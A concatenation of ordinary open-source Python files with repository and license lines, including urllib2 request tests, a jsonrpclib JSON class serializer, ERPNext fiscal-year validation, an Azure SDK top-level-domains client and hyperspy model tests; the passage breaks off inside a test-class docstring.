        self.opener_has_handler(o, urllib2.HTTPHandler)
        o = build_opener(urllib2.HTTPHandler)
        self.opener_has_handler(o, urllib2.HTTPHandler)
        o = build_opener(urllib2.HTTPHandler())
        self.opener_has_handler(o, urllib2.HTTPHandler)

        # Issue2670: multiple handlers sharing the same base class
        class MyOtherHTTPHandler(urllib2.HTTPHandler): pass
        o = build_opener(MyHTTPHandler, MyOtherHTTPHandler)
        self.opener_has_handler(o, MyHTTPHandler)
        self.opener_has_handler(o, MyOtherHTTPHandler)

    def opener_has_handler(self, opener, handler_class):
        """Assert that *opener* holds a handler whose class is exactly
        *handler_class* (subclasses do not count)."""
        for h in opener.handlers:
            if h.__class__ == handler_class:
                break
        else:
            # Was self.assert_(False): a deprecated alias that also gave no
            # diagnostic.  fail() raises the same AssertionError but says
            # what was missing.
            self.fail("opener does not contain a %s instance" % handler_class)
class RequestTests(unittest.TestCase):
    """Unit tests for urllib2.Request accessors."""

    def setUp(self):
        # A GET request (no data) and a POST request (data plus a header).
        self.get = urllib2.Request("http://www.python.org/~jeremy/")
        self.post = urllib2.Request("http://www.python.org/~jeremy/",
                                    "data",
                                    headers={"X-Test": "test"})

    def test_method(self):
        self.assertEqual("POST", self.post.get_method())
        self.assertEqual("GET", self.get.get_method())

    def test_add_data(self):
        # Adding data turns a GET into a POST.  (assert_ is a deprecated
        # alias; use assertTrue.)
        self.assertTrue(not self.get.has_data())
        self.assertEqual("GET", self.get.get_method())
        self.get.add_data("spam")
        self.assertTrue(self.get.has_data())
        self.assertEqual("POST", self.get.get_method())

    def test_get_full_url(self):
        self.assertEqual("http://www.python.org/~jeremy/",
                         self.get.get_full_url())

    def test_selector(self):
        self.assertEqual("/~jeremy/", self.get.get_selector())
        req = urllib2.Request("http://www.python.org/")
        self.assertEqual("/", req.get_selector())

    def test_get_type(self):
        self.assertEqual("http", self.get.get_type())

    def test_get_host(self):
        self.assertEqual("www.python.org", self.get.get_host())

    def test_get_host_unquote(self):
        # %-escapes in the host part are unquoted (%70 -> 'p').
        req = urllib2.Request("http://www.%70ython.org/")
        self.assertEqual("www.python.org", req.get_host())

    def test_proxy(self):
        self.assertTrue(not self.get.has_proxy())
        self.get.set_proxy("www.perl.org", "http")
        self.assertTrue(self.get.has_proxy())
        # The original host is remembered; get_host() now names the proxy.
        self.assertEqual("www.python.org", self.get.get_origin_req_host())
        self.assertEqual("www.perl.org", self.get.get_host())
def test_main(verbose=None):
    """Run this module's doctests and urllib2's, then the unit test classes."""
    from test import test_urllib2
    test_support.run_doctest(test_urllib2, verbose)
    test_support.run_doctest(urllib2, verbose)
    tests = (TrivialTests,
             OpenerDirectorTests,
             HandlerTests,
             MiscTests,
             RequestTests)
    test_support.run_unittest(*tests)

if __name__ == "__main__":
    test_main(verbose=True)
| apache-2.0 |
quanvm009/codev7 | openerp/addons/stock/wizard/__init__.py | 73 | 1416 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import stock_traceability
import stock_move
import stock_splitinto
import stock_partial_picking
import stock_partial_move
import stock_inventory_merge
import stock_fill_inventory
import stock_inventory_line_split
import stock_invoice_onshipping
import stock_location_product
import stock_change_standard_price
import stock_return_picking
import stock_change_product_qty
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
PDXostc/rvi_sota_demo | mod/lib/python/jsonrpclib/jsonclass.py | 17 | 5405 | import types
import inspect
import re
import traceback
from jsonrpclib import config
# Groupings of the Python 2 type objects that dump()/load() can pass
# through unchanged (or recurse into) without a __jsonclass__ wrapper.
iter_types = [
    types.DictType,
    types.ListType,
    types.TupleType
]
string_types = [
    types.StringType,
    types.UnicodeType
]
numeric_types = [
    types.IntType,
    types.LongType,
    types.FloatType
]
value_types = [
    types.BooleanType,
    types.NoneType
]
# Everything serializable without custom class handling.
supported_types = iter_types+string_types+numeric_types+value_types
# Matches any character that may NOT appear in a dotted module path.
invalid_module_chars = r'[^a-zA-Z0-9\_\.]'
class TranslationError(Exception):
    """Raised when an object cannot be converted to or from its JSON form."""
    pass
def dump(obj, serialize_method=None, ignore_attribute=None, ignore=[]):
    """Recursively convert *obj* into a JSON-serializable structure.

    Plain values pass through; lists/tuples/dicts are converted element by
    element; any other object becomes a dict carrying a __jsonclass__ entry
    (JSON-RPC class-hinting) plus its serializable attributes.
    serialize_method / ignore_attribute default to the names configured in
    jsonrpclib.config.  NOTE: *ignore* is a mutable default argument; it is
    only read here, but callers should not rely on mutating it.
    """
    if not serialize_method:
        serialize_method = config.serialize_method
    if not ignore_attribute:
        ignore_attribute = config.ignore_attribute
    obj_type = type(obj)
    # Parse / return default "types"...
    if obj_type in numeric_types+string_types+value_types:
        return obj
    if obj_type in iter_types:
        if obj_type in (types.ListType, types.TupleType):
            new_obj = []
            for item in obj:
                new_obj.append(dump(item, serialize_method,
                                    ignore_attribute, ignore))
            if obj_type is types.TupleType:
                new_obj = tuple(new_obj)
            return new_obj
        # It's a dict...
        else:
            new_obj = {}
            for key, value in obj.iteritems():
                new_obj[key] = dump(value, serialize_method,
                                    ignore_attribute, ignore)
            return new_obj
    # It's not a standard type, so it needs __jsonclass__
    module_name = inspect.getmodule(obj).__name__
    class_name = obj.__class__.__name__
    json_class = class_name
    if module_name not in ['', '__main__']:
        json_class = '%s.%s' % (module_name, json_class)
    return_obj = {"__jsonclass__":[json_class,]}
    # If a serialization method is defined..
    if serialize_method in dir(obj):
        # Params can be a dict (keyword) or list (positional)
        # Attrs MUST be a dict.
        serialize = getattr(obj, serialize_method)
        params, attrs = serialize()
        return_obj['__jsonclass__'].append(params)
        return_obj.update(attrs)
        return return_obj
    # Otherwise, try to figure it out
    # Obviously, we can't assume to know anything about the
    # parameters passed to __init__
    return_obj['__jsonclass__'].append([])
    attrs = {}
    ignore_list = getattr(obj, ignore_attribute, [])+ignore
    for attr_name, attr_value in obj.__dict__.iteritems():
        if type(attr_value) in supported_types and \
                attr_name not in ignore_list and \
                attr_value not in ignore_list:
            attrs[attr_name] = dump(attr_value, serialize_method,
                                    ignore_attribute, ignore)
    return_obj.update(attrs)
    return return_obj
def load(obj):
    """Inverse of dump(): rebuild Python objects from decoded JSON data.

    Dicts carrying a __jsonclass__ key are instantiated by importing the
    named class and calling it with the recorded constructor params; the
    remaining keys are set as attributes.  Module names are sanitized
    against a character whitelist before being passed to __import__.
    """
    if type(obj) in string_types+numeric_types+value_types:
        return obj
    if type(obj) is types.ListType:
        return_list = []
        for entry in obj:
            return_list.append(load(entry))
        return return_list
    # Otherwise, it's a dict type
    if '__jsonclass__' not in obj.keys():
        return_dict = {}
        for key, value in obj.iteritems():
            new_value = load(value)
            return_dict[key] = new_value
        return return_dict
    # It's a dict, and it's a __jsonclass__
    orig_module_name = obj['__jsonclass__'][0]
    params = obj['__jsonclass__'][1]
    if orig_module_name == '':
        raise TranslationError('Module name empty.')
    json_module_clean = re.sub(invalid_module_chars, '', orig_module_name)
    if json_module_clean != orig_module_name:
        raise TranslationError('Module name %s has invalid characters.' %
                               orig_module_name)
    json_module_parts = json_module_clean.split('.')
    json_class = None
    if len(json_module_parts) == 1:
        # Local class name -- probably means it won't work
        if json_module_parts[0] not in config.classes.keys():
            raise TranslationError('Unknown class or module %s.' %
                                   json_module_parts[0])
        json_class = config.classes[json_module_parts[0]]
    else:
        json_class_name = json_module_parts.pop()
        json_module_tree = '.'.join(json_module_parts)
        try:
            temp_module = __import__(json_module_tree)
        except ImportError:
            raise TranslationError('Could not import %s from module %s.' %
                                   (json_class_name, json_module_tree))
        # The returned class is the top-level module, not the one we really
        # want. (E.g., if we import a.b.c, we now have a.) Walk through other
        # path components to get to b and c.
        for i in json_module_parts[1:]:
            temp_module = getattr(temp_module, i)
        json_class = getattr(temp_module, json_class_name)
    # Creating the object...
    new_obj = None
    if type(params) is types.ListType:
        new_obj = json_class(*params)
    elif type(params) is types.DictType:
        new_obj = json_class(**params)
    else:
        raise TranslationError('Constructor args must be a dict or list.')
    # Restore the remaining keys as plain attributes.
    for key, value in obj.iteritems():
        if key == '__jsonclass__':
            continue
        setattr(new_obj, key, value)
    return new_obj
| mpl-2.0 |
Leoniela/nipype | nipype/interfaces/freesurfer/tests/test_auto_ImageInfo.py | 9 | 1181 | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from nipype.testing import assert_equal
from nipype.interfaces.freesurfer.utils import ImageInfo
def test_ImageInfo_inputs():
    """Verify the trait metadata declared on ImageInfo's input spec."""
    expected = dict(
        args=dict(argstr='%s'),
        environ=dict(nohash=True, usedefault=True),
        ignore_exception=dict(nohash=True, usedefault=True),
        in_file=dict(argstr='%s', position=1),
        subjects_dir=dict(),
        terminal_output=dict(nohash=True),
    )
    inputs = ImageInfo.input_spec()

    # Yield one assert per (trait, metadata key) pair, nose-generator style.
    for trait_name, metadata in expected.items():
        trait = inputs.traits()[trait_name]
        for meta_key, meta_value in metadata.items():
            yield assert_equal, getattr(trait, meta_key), meta_value
def test_ImageInfo_outputs():
    """Verify the trait metadata declared on ImageInfo's output spec."""
    expected = dict(
        TE=dict(),
        TI=dict(),
        TR=dict(),
        data_type=dict(),
        dimensions=dict(),
        file_format=dict(),
        info=dict(),
        orientation=dict(),
        out_file=dict(),
        ph_enc_dir=dict(),
        vox_sizes=dict(),
    )
    outputs = ImageInfo.output_spec()

    # Yield one assert per (trait, metadata key) pair, nose-generator style.
    for trait_name, metadata in expected.items():
        trait = outputs.traits()[trait_name]
        for meta_key, meta_value in metadata.items():
            yield assert_equal, getattr(trait, meta_key), meta_value
| bsd-3-clause |
gangadharkadam/sher | erpnext/accounts/doctype/fiscal_year/fiscal_year.py | 35 | 1940 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import msgprint, _
from frappe.utils import getdate
from frappe.model.document import Document
class FiscalYear(Document):
    # Doctype controller for Fiscal Year records.

    def set_as_default(self):
        """Make this fiscal year the company-wide default and clear caches."""
        frappe.db.set_value("Global Defaults", None, "current_fiscal_year", self.name)
        frappe.get_doc("Global Defaults").on_update()

        # clear cache
        frappe.clear_cache()

        msgprint(_("{0} is now the default Fiscal Year. Please refresh your browser for the change to take effect.").format(self.name))

    def validate(self):
        # Once saved, the start/end dates are frozen: an existing DB row
        # with different dates means the user is trying to change them.
        year_start_end_dates = frappe.db.sql("""select year_start_date, year_end_date
            from `tabFiscal Year` where name=%s""", (self.name))

        if year_start_end_dates:
            if getdate(self.year_start_date) != year_start_end_dates[0][0] or getdate(self.year_end_date) != year_start_end_dates[0][1]:
                frappe.throw(_("Cannot change Fiscal Year Start Date and Fiscal Year End Date once the Fiscal Year is saved."))

    def on_update(self):
        # validate year start date and year end date
        if getdate(self.year_start_date) > getdate(self.year_end_date):
            frappe.throw(_("Fiscal Year Start Date should not be greater than Fiscal Year End Date"))

        # 366 days allows for leap years
        if (getdate(self.year_end_date) - getdate(self.year_start_date)).days > 366:
            frappe.throw(_("Fiscal Year Start Date and Fiscal Year End Date cannot be more than a year apart."))

        # No two fiscal years may share exactly the same date range
        # (skipped in tests via frappe.flags.in_test).
        year_start_end_dates = frappe.db.sql("""select name, year_start_date, year_end_date
            from `tabFiscal Year` where name!=%s""", (self.name))

        for fiscal_year, ysd, yed in year_start_end_dates:
            if (getdate(self.year_start_date) == ysd and getdate(self.year_end_date) == yed) \
                and (not frappe.flags.in_test):
                frappe.throw(_("Fiscal Year Start Date and Fiscal Year End Date are already set in Fiscal Year {0}").format(fiscal_year))
| agpl-3.0 |
Azure/azure-sdk-for-python | sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2020_09_01/operations/_top_level_domains_operations.py | 1 | 12345 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class TopLevelDomainsOperations(object):
    """TopLevelDomainsOperations operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.web.v2020_09_01.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = _models

    def __init__(self, client, config, serializer, deserializer):
        # Generated operation-group plumbing: the pipeline client and the
        # (de)serializers are injected by the service client that owns this group.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    def list(
        self,
        **kwargs  # type: Any
    ):
        # type: (...) -> Iterable["_models.TopLevelDomainCollection"]
        """Get all top-level domains supported for registration.

        Description for Get all top-level domains supported for registration.

        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either TopLevelDomainCollection or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2020_09_01.models.TopLevelDomainCollection]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.TopLevelDomainCollection"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-09-01"
        accept = "application/json"

        def prepare_request(next_link=None):
            # Builds the GET request for either the first page (templated URL)
            # or a continuation page (opaque next_link returned by the service).
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

            if not next_link:
                # Construct URL
                url = self.list.metadata['url']  # type: ignore
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                # next_link already embeds all query parameters, including api-version.
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request

        def extract_data(pipeline_response):
            # Deserializes one page and yields (continuation token, page items).
            deserialized = self._deserialize('TopLevelDomainCollection', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

            return pipeline_response

        return ItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains'}  # type: ignore

    def get(
        self,
        name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> "_models.TopLevelDomain"
        """Get details of a top-level domain.

        Description for Get details of a top-level domain.

        :param name: Name of the top-level domain.
        :type name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: TopLevelDomain, or the result of cls(response)
        :rtype: ~azure.mgmt.web.v2020_09_01.models.TopLevelDomain
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.TopLevelDomain"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-09-01"
        accept = "application/json"

        # Construct URL
        url = self.get.metadata['url']  # type: ignore
        path_format_arguments = {
            'name': self._serialize.url("name", name, 'str'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            # NOTE(review): here map_error runs before the error body is
            # deserialized, whereas list()/list_agreements() do the reverse —
            # generated inconsistency; behavior is equivalent when map_error
            # does not raise for the status code.
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        deserialized = self._deserialize('TopLevelDomain', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}'}  # type: ignore

    def list_agreements(
        self,
        name,  # type: str
        agreement_option,  # type: "_models.TopLevelDomainAgreementOption"
        **kwargs  # type: Any
    ):
        # type: (...) -> Iterable["_models.TldLegalAgreementCollection"]
        """Gets all legal agreements that user needs to accept before purchasing a domain.

        Description for Gets all legal agreements that user needs to accept before purchasing a domain.

        :param name: Name of the top-level domain.
        :type name: str
        :param agreement_option: Domain agreement options.
        :type agreement_option: ~azure.mgmt.web.v2020_09_01.models.TopLevelDomainAgreementOption
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either TldLegalAgreementCollection or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2020_09_01.models.TldLegalAgreementCollection]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.TldLegalAgreementCollection"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-09-01"
        content_type = "application/json"
        accept = "application/json"

        def prepare_request(next_link=None):
            # First page is a POST carrying the agreement options in the body.
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

            if not next_link:
                # Construct URL
                url = self.list_agreements.metadata['url']  # type: ignore
                path_format_arguments = {
                    'name': self._serialize.url("name", name, 'str'),
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

                body_content_kwargs = {}  # type: Dict[str, Any]
                body_content = self._serialize.body(agreement_option, 'TopLevelDomainAgreementOption')
                body_content_kwargs['content'] = body_content
                request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
            else:
                # NOTE(review): continuation pages are issued as GET but still
                # re-serialize and attach the request body — this is the stock
                # autorest paging template for POST-based listings; presumably
                # the service ignores the body on next-link calls. Confirm
                # before changing, as regeneration would overwrite any edit.
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                body_content_kwargs = {}  # type: Dict[str, Any]
                body_content = self._serialize.body(agreement_option, 'TopLevelDomainAgreementOption')
                body_content_kwargs['content'] = body_content
                request = self._client.get(url, query_parameters, header_parameters, **body_content_kwargs)
            return request

        def extract_data(pipeline_response):
            # Deserializes one page and yields (continuation token, page items).
            deserialized = self._deserialize('TldLegalAgreementCollection', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

            return pipeline_response

        return ItemPaged(
            get_next, extract_data
        )
    list_agreements.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}/listAgreements'}  # type: ignore
| mit |
to266/hyperspy | hyperspy/tests/model/test_model.py | 1 | 37018 | import numpy as np
import nose.tools as nt
import mock
import hyperspy.api as hs
from hyperspy.misc.utils import slugify
class TestModelJacobians:

    """Tests for Model._jacobian, both with and without low-loss convolution.

    sigma is twinned to centre, so the two gradients collapse into a single
    free-parameter column of the Jacobian.
    """

    def setUp(self):
        s = hs.signals.Spectrum(np.zeros(1))
        m = s.create_model()
        self.low_loss = 7.
        self.weights = 0.3
        m.axis.axis = np.array([1, 0])
        # Only the second channel participates in the fit.
        m.channel_switches = np.array([0, 1], dtype=bool)
        m.append(hs.model.components.Gaussian())
        m[0].A.value = 1
        m[0].centre.value = 2.
        # Twinning makes sigma track centre; their gradients are summed.
        m[0].sigma.twin = m[0].centre
        # Replace the low-loss signal with a scalar-returning mock so the
        # convolution contribution is just a multiplicative factor.
        m._low_loss = mock.MagicMock()
        m.low_loss.return_value = self.low_loss
        self.model = m
        m.convolution_axis = np.zeros(2)

    def test_jacobian_not_convolved(self):
        m = self.model
        m.convolved = False
        jac = m._jacobian((1, 2, 3), None, weights=self.weights)
        # Columns: dA, d(centre)+d(sigma) (twinned), each scaled by weights.
        np.testing.assert_array_almost_equal(jac.squeeze(), self.weights *
                                             np.array([m[0].A.grad(0),
                                                       m[0].sigma.grad(0) +
                                                       m[0].centre.grad(0)]))
        # _jacobian must also have stored the trial parameter values.
        nt.assert_equal(m[0].A.value, 1)
        nt.assert_equal(m[0].centre.value, 2)
        nt.assert_equal(m[0].sigma.value, 2)

    def test_jacobian_convolved(self):
        m = self.model
        m.convolved = True
        m.append(hs.model.components.Gaussian())
        # Only the second component is convolved with the (mocked) low loss.
        m[0].convolved = False
        m[1].convolved = True
        jac = m._jacobian((1, 2, 3, 4, 5), None, weights=self.weights)
        np.testing.assert_array_almost_equal(jac.squeeze(), self.weights *
                                             np.array([m[0].A.grad(0),
                                                       m[0].sigma.grad(0) +
                                                       m[0].centre.grad(0),
                                                       m[1].A.grad(0) *
                                                       self.low_loss,
                                                       m[1].centre.grad(0) *
                                                       self.low_loss,
                                                       m[1].sigma.grad(0) *
                                                       self.low_loss,
                                                       ]))
        nt.assert_equal(m[0].A.value, 1)
        nt.assert_equal(m[0].centre.value, 2)
        nt.assert_equal(m[0].sigma.value, 2)
        nt.assert_equal(m[1].A.value, 3)
        nt.assert_equal(m[1].centre.value, 4)
        nt.assert_equal(m[1].sigma.value, 5)
class TestModelCallMethod:

    """Tests for Model.__call__: active-only evaluation, convolution and binning."""

    def setUp(self):
        s = hs.signals.Spectrum(np.empty(1))
        m = s.create_model()
        m.append(hs.model.components.Gaussian())
        m.append(hs.model.components.Gaussian())
        self.model = m

    def test_call_method_no_convolutions(self):
        m = self.model
        m.convolved = False
        # Deactivate the second (identical) Gaussian: full sum is 2x one
        # component, active-only sum is 1x.
        m[1].active = False
        r1 = m()
        r2 = m(onlyactive=True)
        np.testing.assert_almost_equal(m[0].function(0) * 2, r1)
        np.testing.assert_almost_equal(m[0].function(0), r2)
        # non_convolved=True must bypass convolution even when enabled.
        m.convolved = True
        r1 = m(non_convolved=True)
        r2 = m(non_convolved=True, onlyactive=True)
        np.testing.assert_almost_equal(m[0].function(0) * 2, r1)
        np.testing.assert_almost_equal(m[0].function(0), r2)

    def test_call_method_with_convolutions(self):
        m = self.model
        # Mock low loss so the convolved component contributes a 0.3 factor.
        m._low_loss = mock.MagicMock()
        m.low_loss.return_value = 0.3
        m.convolved = True
        m.append(hs.model.components.Gaussian())
        m[1].active = False
        m[0].convolved = True
        m[1].convolved = False
        m[2].convolved = False
        m.convolution_axis = np.array([0., ])
        r1 = m()
        r2 = m(onlyactive=True)
        # All three: 0.3 (convolved) + 1 + 1; active only: 0.3 + 1.
        np.testing.assert_almost_equal(m[0].function(0) * 2.3, r1)
        np.testing.assert_almost_equal(m[0].function(0) * 1.3, r2)

    def test_call_method_binned(self):
        m = self.model
        m.convolved = False
        m.remove(1)
        # Binned signals scale the model by the axis step (0.3 here).
        m.signal.metadata.Signal.binned = True
        m.signal.axes_manager[-1].scale = 0.3
        r1 = m()
        np.testing.assert_almost_equal(m[0].function(0) * 0.3, r1)
class TestModelPlotCall:

    """Tests for Model._model2plot with the model's own vs. a foreign axes_manager."""

    def setUp(self):
        s = hs.signals.Spectrum(np.empty(1))
        m = s.create_model()
        # Stub out evaluation: the model "returns" two in-range values.
        m.__call__ = mock.MagicMock()
        m.__call__.return_value = np.array([0.5, 0.25])
        m.axis = mock.MagicMock()
        m.fetch_stored_values = mock.MagicMock()
        # Channels 1 and 2 (of 5) are inside the fitting range.
        m.channel_switches = np.array([0, 1, 1, 0, 0], dtype=bool)
        self.model = m

    def test_model2plot_own_am(self):
        m = self.model
        m.axis.axis.shape = (5,)
        res = m._model2plot(m.axes_manager)
        # Out-of-range channels are padded with NaN when plotting in place.
        np.testing.assert_array_equal(
            res, np.array([np.nan, 0.5, 0.25, np.nan, np.nan]))
        nt.assert_true(m.__call__.called)
        nt.assert_dict_equal(
            m.__call__.call_args[1], {
                'non_convolved': False, 'onlyactive': True})
        # Same axes_manager: no need to re-fetch stored parameter values.
        nt.assert_false(m.fetch_stored_values.called)

    def test_model2plot_other_am(self):
        m = self.model
        res = m._model2plot(m.axes_manager.deepcopy(), out_of_range2nans=False)
        np.testing.assert_array_equal(res, np.array([0.5, 0.25]))
        nt.assert_true(m.__call__.called)
        nt.assert_dict_equal(
            m.__call__.call_args[1], {
                'non_convolved': False, 'onlyactive': True})
        # Foreign axes_manager: values are fetched (and restored) around the call.
        nt.assert_equal(2, m.fetch_stored_values.call_count)
class TestModelSettingPZero:

    """Tests for the p0 parameter-vector round trip and boundary bookkeeping.

    The single Gaussian has a two-element centre, a fixed sigma, and explicit
    bounds on every parameter; an inactive second component must be ignored
    everywhere.
    """

    def setUp(self):
        s = hs.signals.Spectrum(np.empty(1))
        m = s.create_model()
        m.append(hs.model.components.Gaussian())
        m[0].A.value = 1.1
        # Make centre a 2-element parameter so p0 flattening is exercised.
        m[0].centre._number_of_elements = 2
        m[0].centre.value = (2.2, 3.3)
        m[0].sigma.value = 4.4
        m[0].sigma.free = False
        m[0].A._bounds = (0.1, 0.11)
        m[0].centre._bounds = ((0.2, 0.21), (0.3, 0.31))
        m[0].sigma._bounds = (0.4, 0.41)
        self.model = m

    def test_setting_p0(self):
        m = self.model
        m.append(hs.model.components.Gaussian())
        m[-1].active = False
        m.p0 = None
        m._set_p0()
        # Only free parameters of active components: A + both centre elements.
        nt.assert_equal(m.p0, (1.1, 2.2, 3.3))

    def test_fetching_from_p0(self):
        m = self.model
        m.append(hs.model.components.Gaussian())
        m[-1].active = False
        m[-1].A.value = 100
        m[-1].sigma.value = 200
        m[-1].centre.value = 300
        m.p0 = (1.2, 2.3, 3.4, 5.6, 6.7, 7.8)
        m._fetch_values_from_p0()
        nt.assert_equal(m[0].A.value, 1.2)
        nt.assert_equal(m[0].centre.value, (2.3, 3.4))
        # Fixed parameter keeps its value.
        nt.assert_equal(m[0].sigma.value, 4.4)
        # Inactive component is untouched even though p0 has extra entries.
        nt.assert_equal(m[1].A.value, 100)
        nt.assert_equal(m[1].sigma.value, 200)
        nt.assert_equal(m[1].centre.value, 300)

    def test_setting_boundaries(self):
        m = self.model
        m.append(hs.model.components.Gaussian())
        m[-1].active = False
        m.set_boundaries()
        nt.assert_equal(m.free_parameters_boundaries,
                        [(0.1, 0.11), (0.2, 0.21), (0.3, 0.31)])

    def test_setting_mpfit_parameters_info(self):
        m = self.model
        # One-sided bounds: mpfit encodes them via 'limited' flags with 0
        # placeholders for the missing side.
        m[0].A.bmax = None
        m[0].centre.bmin = None
        m[0].centre.bmax = 0.31
        m.append(hs.model.components.Gaussian())
        m[-1].active = False
        m.set_mpfit_parameters_info()
        nt.assert_equal(m.mpfit_parinfo,
                        [{'limited': [True, False],
                          'limits': [0.1, 0]},
                         {'limited': [False, True],
                          'limits': [0, 0.31]},
                         {'limited': [False, True],
                          'limits': [0, 0.31]},
                         ])
class TestModel1D:

    """Unit tests for the 1D Model container behaviour.

    Covers the error/gradient helper functions, component append/remove/
    delete/lookup by name, index and object, the ``model.components``
